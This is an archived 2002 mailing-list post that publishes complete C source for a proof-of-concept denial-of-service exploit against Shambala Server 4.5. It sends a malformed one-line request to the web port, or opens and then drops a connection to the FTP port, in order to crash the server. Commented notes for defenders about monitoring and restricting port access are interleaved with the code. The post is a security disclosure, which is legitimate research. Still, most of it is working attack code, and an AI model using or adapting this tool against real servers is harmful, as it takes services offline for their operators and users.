Exploit for previously reported DoS issues in Shambala Server 4.5

From: Daniel Nyström (exceat_private)
Date: Tue Jul 09 2002 - 01:46:42 PDT


    DoS exploit for previously discussed issues in Shambala Server 4.5.
    
    
    -- 
    
    
    /***********************************
    * Daniel Nyström, Telhack 026 Inc. *
    ***********************************/
    
    http://www.SweSec.tk
    http://www.telhack.tk
    
    
    
    /******** shambalax.c ***********************************************************
    *                                                       			*
    * PoC exploit for the DoS in Shambala Server 4.5        			*
    * as described in Telhack 026 Inc. S.A. #3 (BID:4897).  			*
    * I have also built in a function that exploits another 			*
    * DoS condition found by zillion a long long time ago.  			*
    * Also refined my DoS a little bit by just using one                            *
    * char that messes up Shambala.                                                 *
    *                                                       			*
    * By: Daniel Nyström (excE) <exceat_private>         			*
    *                                                       			*
    *                                                       			*
    * Notes:                                                                        *
    * I found that zillion was only almost right: it is not                         *
    * opening a lot of TCP connections that generates the DoS                       *
    * he found, it is just one TCP connection. But it certainly                     *
    * has to do with bad connection handling by Shambala.                           *
    *                                                                               *
    *                                                                               *
    *                                                                               *
    * Credits:                                                                      *
    * Zillion <zillionat_private> - for discovering the FTP DoS                  *
    *                                                       			*
    * Greetz:                                                                       *
    * Xenogen <*****@**********.***> - for promising to report any segfaults :)     *
    * X-Rewt  <*****@**********.***> - Cuz he's in my school :P                     *
    * Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))    *
    *                                                                               *
    *********************************************************** shambalax.c ********/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/socket.h>
    
    
    /*
     * main - proof-of-concept client for two denial-of-service conditions in
     * Shambala Server 4.5 (the file header cites BID:4897 for the author's own
     * finding and credits zillion for the FTP one).
     *
     * argv[1]  host name or address, resolved with gethostbyname()
     * argv[2]  trigger type; only its first character is examined:
     *            '1' - connect to TCP port 80 and send the 3 bytes "!\r\n"
     *            '2' - connect to TCP port 21 and close without sending data
     *
     * Exits with status 1 on a usage error, a failed lookup, or a failed
     * socket()/connect()/send().  The program never reads a reply, so the
     * closing message is a guess about the server's state, not a verified
     * result.
     *
     * Defender's view: each trigger is one short-lived TCP connection.  The
     * HTTP case carries a single line that is not a valid HTTP request; the
     * FTP case is a connection closed before any FTP command is sent.  If the
     * server is affected as the post claims, the service stops answering
     * afterwards, so availability monitoring and connection logs around the
     * time of the outage are the places to look.  This page does not say
     * whether a fixed release exists (confirm with the vendor); until then,
     * limiting which networks can reach ports 80 and 21 on such a host
     * reduces exposure.
     */
    int main(int argc, char *argv[])
    {
    	int sockfd;
    	int port;
    	int numbytes;	/* declared but never used in this function */
    	
    	struct sockaddr_in target;
    	struct hostent *he;
    
    	/* Exactly two arguments are required: <target> and <type>. */
    	if (argc != 3)
    	{
    		fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");
    		fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);
    		fprintf(stderr, "\nTypes:");
    		fprintf(stderr, "\n1  -  HTTPD DoS");
    		fprintf(stderr, "\n2  -  FTP DoS\n\n");
    		exit(1);
    	}
    	
    	printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");
    	printf("-> Starting...\n");	
    	printf("->\n");
    
    	/* Name resolution happens once, before the type argument is checked. */
    	if ((he=gethostbyname(argv[1])) == NULL)
    	{
    		herror("gethostbyname");
    		exit(1);
    	}
    
    	/* One TCP socket is created up front and used by whichever branch runs. */
    	if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)
    	{
    		perror("socket");
    		exit(1);
    	}
    
    	/* HTTPD DoS: a single connection to port 80 carrying one 3-byte line. */
    	if(argv[2][0] == '1')
    	{
    		port = 80;
    		target.sin_family = AF_INET;
    		target.sin_port = htons(port);
    		/* Only the first address returned by the lookup is used. */
    		target.sin_addr = *((struct in_addr *)he->h_addr);
    		bzero(&(target.sin_zero), 8);
    		printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
    		printf("->\n");
    		if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
    		{
    			perror("connect");
    			exit(1);
    		}
    		printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");	
    		printf("->\n");
    		/*
    		 * The whole payload is '!' followed by CRLF; the file header says
    		 * one character is what upsets the server.  Nothing is read back.
    		 */
    		if(send(sockfd, "!\r\n", 3, 0) == -1)
    		{
    			perror("send");
    			exit(1);
    		}	
    		close(sockfd);
    	}
    	else
    	
    	/*
    	 * FTPD DoS: the `else` above binds to this `if`.  No bytes are sent;
    	 * the socket is connected to port 21 and closed immediately.  The file
    	 * header's notes attribute the crash to the server's connection
    	 * handling rather than to a flood of connections.
    	 */
    	if(argv[2][0] == '2')
    	{
                    port = 21;
                    target.sin_family = AF_INET;
                    target.sin_port = htons(port);
                    /* Only the first address returned by the lookup is used. */
                    target.sin_addr = *((struct in_addr *)he->h_addr);
                    bzero(&(target.sin_zero), 8);
                    printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));
                    printf("->\n");
                    if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
                    {
                            perror("connect");
                            exit(1);
                    }
                    close(sockfd);
    	}
    	else
    	{
    		/* Any first character other than '1' or '2' is rejected here. */
    		fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
    		exit(1);		
    	}
    
    	/* Printed unconditionally after either branch; the outcome is not checked. */
    	printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);
    
    	/* No explicit return statement: control reaches the end of main. */
    }
    
    /* EOF - Shambala Server 4.5 DoS exploit     */
    /* Daniel Nyström (excE) <exceat_private> */
    


